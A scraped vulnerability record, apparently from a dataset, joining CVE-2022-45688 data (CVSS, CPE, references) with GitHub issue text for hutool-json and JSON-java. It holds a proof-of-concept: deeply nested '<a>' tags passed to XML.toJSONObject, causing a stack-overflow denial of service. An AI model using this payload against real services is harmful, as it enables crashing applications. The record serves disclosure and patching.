<a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a>";
XML.toJSONObject(s);
}
```
2. 堆栈信息
<img width="1110" alt="image" src="https://user-images.githubusercontent.com/32029400/202852107-dc953095-597e-419f-9c37-2c7b3f07a7a3.png">
3. 测试涉及到的文件(注意脱密)
比如报错的Excel文件,有问题的图片等。 | Find a StackOverflowError which may lead to dos in hutool-json | https://api.github.com/repos/chinabugotech/hutool/issues/2748/comments | 7 | 2022-11-19T13:02:23Z | 2024-01-05T04:37:53Z | https://github.com/chinabugotech/hutool/issues/2748 | 1,456,460,513 | 2,748 | 4,494 |
CVE-2022-45688 | 2022-12-13T15:15:11.267 | A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2748"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stleary/JSON-java/issues/708"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2748"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stleary/JSON-java/issues/708"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hutool:hutool:5.8.10:*:*:*:*:*:*:*",
"matchCriteriaId": "B9093201-DAC8-4158-83DA-F0DC735A7F16",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json-java_project:json-java:*:*:*:*:*:*:*:*",
"matchCriteriaId": "201C4D64-D9BD-42F2-862D-E1694D3F0AE8",
"versionEndExcluding": "20230227",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/stleary/JSON-java/issues/708 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"stleary",
"JSON-java"
] | Poc code as follow:
```
public class poc {
public static void main(String[] args) throws JSONException {
String s="<a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a